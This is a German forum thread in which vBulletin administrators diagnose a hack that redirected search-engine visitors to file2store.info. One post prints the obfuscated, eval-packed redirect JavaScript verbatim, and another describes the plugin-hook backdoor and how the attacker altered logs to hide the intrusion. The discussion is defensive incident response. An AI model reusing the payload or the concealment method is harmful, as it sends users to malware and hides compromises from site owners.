Sicherheitsproblem: Umleitung auf file2store.info

[CThiessen]

Moin,
folgendes Problem.
Seit 1.3.10 habe ich in Adsens weniger Impression und in Analytics weniger Besucher.
Laut Forum und nach den Logfiles ist der Besuch aber beständig geblieben.

Zunächst konnte ich mir das nicht erklären.
Heute habe, mal wieder einige Suchtests gemacht.
Gesucht habe ich nach:

Code:

site:brasil-web.de inurl:/pt/ vbsoccer

Dabei ist mir folgendes Aufgefallen.
Die Anfrage wird umgeleitet auf file2store.info

Im Firefox, neuer Tab, konnte ich nicht zurück gehen.
Im IE, neuer Tab, konnte ich von dieser Seite zurück auf das Forum.

Es schient so zu sein das Forum/Server die Anfrage weiterleiten.
Ich hatte diesen Effekt zu hause (Norten360) und auch auf der Arbeit (McAffe)

In diesem Beitrag:
http://groups.google.com/group/publi...691cbc3e?pli=1
steht folgendes:

Code:

I've been Googling this all weekend trying to find some answers.  It 
 appears that all the sites that are having their users redirected to 
 file2store DOT info are running vBulletin version 3.8.4 or older, so 
 it appears this may be a vBulletin exploit of some type.

Ich habe gerade noch mal alles Dateien von vB 3.8.4 und von vBSEO neu hoch geladen.
Mein Forum war im November von dem vBSEO Problem betroffen.
Die im vBSEO genannten Tipps zur Suche von Problemen auf dem Server ergeben aktuell kein Problem.

Für mich:
Ich bin für weiter Tipps dankbar wie ich nach dem Problem fahnden kann.

Für alle:
Überprüft mal die Suche nach eurem Forum ob ihr ähnliches habt und vergleicht ggf. Adsens, Analytics oder Anderes mit euren Logfiles ob es dabei Auffälligkeiten gibt.

Es scheint so zu sein als wenn zu diesen Umleitungen nur bei Gästen vorkommt die von Google (anderen Suchmaschinen?) kommen.
Da wir als Admins und unsere User die URL direkt aufrufen wird das Problem nicht so schnell bemerkt.

Gruß
Christian

PS: Ich habe diesen Beitrag auch bei vBSEO im Forum gepostet. Sollte jemand feststellen das er das gleiche Problem hat aber nicht vBSEO einsetzt wäre eine Rückmeldung hilfreich damit das Problem eingegrenzt werden kann.

[StGaensler]

Hallo Christian,

das vbsoccer.php Script gehört nicht zu vBulletin, das Problem tritt aber auch bei vBulletin-Seiten auf.

Die Weiterleitung tritt bei mir nur unter folgenden Bedingungen auf:

• Ich klicke auf den Google-Link (neuladen der Seite reicht nicht aus)
• Das Cookie vbsp ist nicht gesetzt (wird beim ersten Besuch auf 1 gesetzt)

Dann sieht der HTML-Quelltext der Seite folgendermaßen aus:

HTML-Code:

<html><head></head><body><script type="text/javascript">var vbsp='99AA1663';eval(function(p,a,c,k,e,d){e=function(c){return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--){d[e(c)]=k[c]||e(c)}k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c])}}return p}('o a=["\\A\\c\\e\\l\\d\\y\\c","\\k\\c\\e\\l\\d\\y\\c","\\B\\x\\c\\L\\f\\d\\q\\c\\k\\h","\\e\\b\\M\\N\\l\\O\\e\\q\\d\\j\\A","\\w\\b\\b\\J\\d\\c","\\h","\\B\\x\\f\\r\\e\\n\\h\\i","\\G\\H\\k\\f","\\I","\\p\\b\\w\\r\\e\\d\\b\\j","\\n\\e\\e\\f\\Q\\i\\i\\D\\d\\p\\c\\P\\k\\e\\b\\q\\c\\C\\d\\j\\D\\b\\i\\m\\b\\S\\j\\p\\b\\r\\m\\C\\f\\n\\f\\T\\d\\m\\h"];E z(u,t){o g=F K();g[a[1]](g[a[0]]()+R);o s=a[2]+g[a[3]]();v[a[4]]=u+a[5]+t+s+a[6]};z(a[7],a[8]);v[a[9]]=a[V]+U;',58,58,'||||||||||_0x95ee|x6F|x65|x69|x74|x70|_0x601cx4|x3D|x2F|x6E|x73|x54|x64|x68|var|x6C|x72|x61|_0x601cx5|_0x601cx3|_0x601cx2|document|x63|x20|x6D|ipbcc|x67|x3B|x2E|x66|function|new|x76|x62|x31|x6B|Date|x78|x47|x4D|x53|x32|x3A|86400000|x77|x3F|vbsp|10'.split('|'),0,{}))</script></body></html>

Bei file2store lag wohl eine böse Datei, aber da informiert mich nur noch eine Fehlermeldung, dass es die Datei nicht gibt.

Freundliche Grüße

Stefan

[CThiessen]

Moin,
es liegt nicht am vbSoccer Script. Das ist von einem Add-on nur war mir das dort aufgefallen.
Das passiert auch bei Links zu "normalen" Beiträgen oder Startseite.

Seiten die ich beim Googlen gefunden habe, mit ähnlichen Problem, nutzen auch vBSEO.
Ich vermute (ist aber ein Bauchgefühl) das kommt von vBSEO.

Die Frage ist: Wie finde ich heraus wie das da rein kommt.
Aber der Cookie ist schon mal hilfreich. Durch löschen von dem Cookie kann ich das Problem nachvollziehbar machen.

Und das Problem wurde durch neu hoch laden von vB und vbSEO nicht gelöst.

Christian

EDIT. Es gibt Meldungen das der Virenscanner Alarm gemacht hat, das ist aber vorbei, die Datei ist entfernt worden.

[CThiessen]

Moin,
das Ergebnis weiterer Untersuchungen.

1.) jedes Mal wenn ich den Cookie vbsp lösche kann ich den Fehler reproduzieren:
- nur über Googel, nicht direkt
- auf jeder Seite

2.) Deaktivieren von vBSEO brimgt keine Änderung

3.) Generell Add-On und Plug-in zu deaktivieren hilft.

Das letzte was ich deaktiviert hatte war der Blog, danach war der Fehler weg. Beim Aktivieren ist er aber auch nicht wieder gekommen.
Dennoch habe ich alle Datein vom Blog neu hoch geladen.

Ich habe allerdings den Eindruck das das Löschen vom APC Cache nicht immer sofort wirkt. Kann es sein das der Server noch irgendwo cached?

Würde der Blog theoretisch in Frage kommen? Wird eine oder mehrere Dateien vom Bog immer mit eingebunden? auch wenn ich z.B ein Add-on aufrufe und eigentlich nur der Header mit angezeigt wird?

Gruß
Christian

[StGaensler]

Hallo Christian,

gut, dass du inzwischen weitergekommen bist. Ja, das kann auch durch ein (modifiziertes) Blog-Plug-in passieren. Der Blog besteht aus vielen Plug-ins, u.a. auch einem, welches über den Hook init_startup bei jedem Seitenaufruf mit eingebunden wird.
Wenn du die Dateien vom Blog neu nochgeladen hast, installiere sicherheitshalber auch das Add-on noch einmal (einfach überschreiben, wie beim Update).

Für was meinst du genau den Cache? vBulletin selbst hat auch noch ein paar kleinere Caches, die werden aber eigentlich immer beim Benutzen der entsprechenden Funktionen geleert. Denkbar wäre, dass nur so ein Cache verändert wurde - das bräuchte dann aber schon etwas mehr kriminelle Energie, wobei ich dem Angreifer die auch zutraue, so "sorgfältig" wie der arbeitet, damit dir das ja nicht auffällt (nur bei Google (externem?) Link, Cookie wird gesetzt).

Da die Weiterleitung jetzt nicht mehr auftritt: Ändere jetzt alle Passwörter (auch das für die Datenbank), und kontrolliere die Logdateien kurz vor dem Besuchereinbruch, ob dir da etwas merkwürdiges auffällt.

Freundliche Grüße

Stefan

[AA_]

na dann will ich doch wohl mal hoffen, dass es am blog liegt *g*

[CThiessen]

Moin,
der Einbruch ist schon recht überlegt gewesen.
Da das Ganze sehr schwer auffällt.

Nur von Google und mit Cookie, macht das Ganze schwer ersichtlich.
Das man mal auf eine andere Seit kommt passiert schon mal, verklickt, Fehler bei Google e.t.c
Normalerweise wird man da nicht misstrauisch.

Ich würde auch nicht ausschließen das das Problem noch bei Anderen aktuell vorhaben ist.

Im das zu testen:

• Suchen und ggf. löschen vom Cookie vbsp
• Die eigene Seite über Google suchen (site:meineSeite.com)
  
• Einem Link folgen und sehen ob man richtig ankommt
• IE verwenden Beim Firefox gab es kein "zurück" im neuen Tab beim IE schon

Was ich jetzt noch nicht weiß. Wo ist die Lücke die das möglich machte.
Da ein Cookie mit Namen "vbsp". Ich habe daher nach "vbsp" gesucht als Inhalt in alle Dateien im Ordner /forum/ und in den Tabellen der Datenbank (auch plugin) - ohne Erfolg.

Möglich wäre theoretisch auch das der Name vom Cookie nicht bei allen gleich ist. Vorstellbar wäre wohl auch das das ein "Schläfer" war der von der vBSEO Lücke im November schon vorhanden war und am 1.3 aktiv wurde. Alle Meldungen die ich im Internet gefunden haben sind aus dem März.

Ich würde jedem empfehlen seine Seite mal wie oben beschrieben zu testen.

Gruß
Christian

[CThiessen]

Moin,
interessant ist sich mal die Zielseite in Alexa anzuschauen.
http://www.alexa.com/siteinfo/file2s...o#trafficstats

Die Seite hat überhaupt erst Traffic seid Ende Feb dann aber sehr viel.

Die Upstream Sites sind fast nur vBulletin. Einige haben das Problem noch, andere habe es schon beseitigt (auch durch update auf 4.x)

Ich konnte aber nur einen Admin benachrichtigen, andere habe ihr Kontaktformular de aktiv oder ich kann es nicht lesen.

Gruß
Christian

[thompson]

also ich schein das problem auch zu haben. hab seit genau 22.2.10 in adsense und auch in analytics einen einbruch von mehr als 50 %. ich hab aber z.b. am 21.2. noch den arcade mod upgedated.

wie kann das problem denn jetzt genau gelöst werden ?

http://www.sportsuche.info/forum und http://www.muskelbody.info/forum scheinen betroffen (wobei sportsuche keinen blog einsetzt)

edit: so wie es aussieht gibt es auf jeden fall mal keinen cookie, der so heißt.

[CThiessen]

Moin,
ich kann das bei dir, suchen über Google, nur bei Sportsuche feststellen.
Ich habe bei mit alle Dateien neu hoch geladen (Forum,vbSEO und Blog).
Auch, wenn vorhanden, die XML neu importiert und in die Passwörter geändert (auch Datenbank).
Ich konnte nicht mal feststellen wo das Problem eigentlich lag, geschweige denn wie es zu Stande gekommen ist.

Bei dem vBSEO Problem vom November konnte ich aber feststellen das ich Dateien im Root vom Forum hatte die auf dem Server vorhanden waren.
Diese Dateien enthielten Schadcode und
am Anfang Kommentare wie Sie bei vBullein üblich sind, auch dann wenn die Original Datei auf dem Server gar nicht zu vBulletin gehört. In einem Fall von einem Smilygenerator.


Gruß
Christian

[thompson]

bei muskelbody hatte ich vorhin nach dem post kurz den blog neu hochgeladen. bei sportsuche gibt es den blog aber nicht. jetzt lade ich mal die 3.8.5 hoch und vbseo.

das müssen aber andere doch auch gehabt haben oder ? seltsam.

ps: das interesse von vbulletin scheint ja nicht sonderlich groß zu sein. hattest du auch auf vb.com gepostet ?

[CThiessen]

Moin,
ich denke mal das wir es hier mit einer sehr intelligenten Aktion zu tun haben.
Da das nicht passiert wenn die URL direkt aufgerufen wird, merken Admins und Stammuser das nicht.

Es könnte sein das das noch Überreste vom November vBSEO Problem sind (oder auch nicht)
Da die Umleitung bei allen Seiten auftritt, auch wenn eine PHP von einem Add-on aufgerufen wird muss sich der Schadcode an eine Plug-In? anhängen das immer aufgerufen wird.
Kann sein das Plug-In´s vom Blog die erste Wahl sind aber auch andere Stellen verwendet werden können.

Ich werde noch mal in den USA posten. Ich kann zwar nichts genaues sagen aber immerhin wissen wir, wie wir testen können ob ein Server betroffen ist.

Gruß
Christian

[thompson]

ich hab bei mir alle dateien neu überschrieben mit der 3.8.5 kannst du das nochmals prüfen ? (sportsuche)

danke mal.

[CThiessen]

Moin,
der Fehler scheint verschwunden auch bei Sportsuche.
Keine Umleitung und kein Cookie.

Gruß
Christian

[thompson]

danke dir erstmal. jetzt muss nur noch genau geortet werden, woher das problem kommt.

[Andreas]

Der Angriff (hinter dem enorme kriminelle Energie steckt!) läuft folgendermaßen ab:

• Es erfolgt ein direkter Login im AdminCP
• An ein Plug-in auf Hook global_start werden etliche Leerzeilen und verschlüsselter PHP-Code angehängt.
  Häufig wird hierfür ein Plug-in von vBSEO genutzt.
  Der Code tut folgendes:
  - Kommt der Besucher von einer Suchmaschine und ist kein Cookie gesetzt so wird er weitergeleitet
  - Ist das Cookie gesetzt passiert nichts
  Darüber hinaus enthält er ein Backdoor über welches der Angreifer beliebigen PHP-Code ausführen kann.
• Über eine andere IP-Adresse wird mit Hilfe des Backdoors das Kontrollzentrum-Protokoll frisiert sodass die ausgeführten Aktionen (Plug-in verändert) nicht mehr auftauchen und auch keine Lücken entstehen
• Ebenso wird die letzte Aktivität des genutzten Accouts zurückgesetzt sodass auch hier keine Anomalitäten zu erkennen sind

Die letzten beiden Aktionen erkennt man evtl. im Apache Access Log an POST-Requests auf Scripte die normalerweise kein POST verarbeiten (z.B. index.php)

Auch das Aufrufen des Plug-ins im ACP sollte zu erkennen sein (mit den eigenen IPs abgleichen).

[CThiessen]

Moin,
danke für die Erklärung. Damit kann jemand bei dieses Problem auch auftritt ggf. den Code finden und zur Untersuchung kopieren.
..dann schauen wir mal.
Im Log vom Kontrollzentrum steht, wie schon erwartet nichts.
Ich habe nun eine Datei other_vhosts_access.log.1 letzte Änderung 7.März 1040 MB und eine other_vhosts_access.2.gz letzte Änderung 28 Feb. 107 MB
ich vermute mal die .2 ist mein Kanditat.

Nun sind 107 MB gezipt keine angenehme Lektüre.
Kann du mir sagen wie ich wonach suchen kann.

Ich nutze normalerweise zum lesen Notepad++ kann mir das helfen.
Oder kann ich über SSH (Putty) und Kommandozeile irgendwas suchen und finden?

Und hilft uns das überhaupt was. Ich habe Gestern nochmal alle Passwörter geändert und einen Admin, den ich nicht erreiche zum normalen User gemacht.
Ich kann in meinen Router Log nur bis zum 1.3 zurück sehen aber da sind die ersten beider Octets jeweils gleich auf der Arbeit habe ich ohnehin eine feste IP sodass ich meine IP´s recht eindeutig identifizieren kann.

Gruß
Christian

[CThiessen]

Moin,
bei mir bleiben folgende Fragen offen:

• wie konnte sich der Hacker in AdminCP einloggen
• gibt es noch eine unentdeckte Backdoor
• wie viele Seiten sind noch betroffen.

Keine Ahnung wie verlässlich die Alexa Zahlen sind aber wenn ich mir anschaue das die Zielseite innerhalb von 2 Wochen eine Reichweite bekommt wie z.B das Handelsblatt. Insbesondere vor dem Hintergrund das durch das Cookie die Seite wohl nur einmal aufgerufen wird:

alexa3.jpg

Gruß
Christian

[Andreas]

Oder kann ich über SSH (Putty) und Kommandozeile irgendwas suchen und finden?

Ja, Stichwort grep.

wie konnte sich der Hacker in AdminCP einloggen

Das ist die spannende Frage auf die ich leider auch keine Antwort habe
Soweit es zu erkennen ist wurden gültige Passwörter genutzt.

[thompson]

ich hoffe mal, dass die lücke nur an den passwörtern lag, denn das wäre ja einfach zu beheben. aber ganz glauben kann ich das noch nicht. aber super, dass ihr dran seid.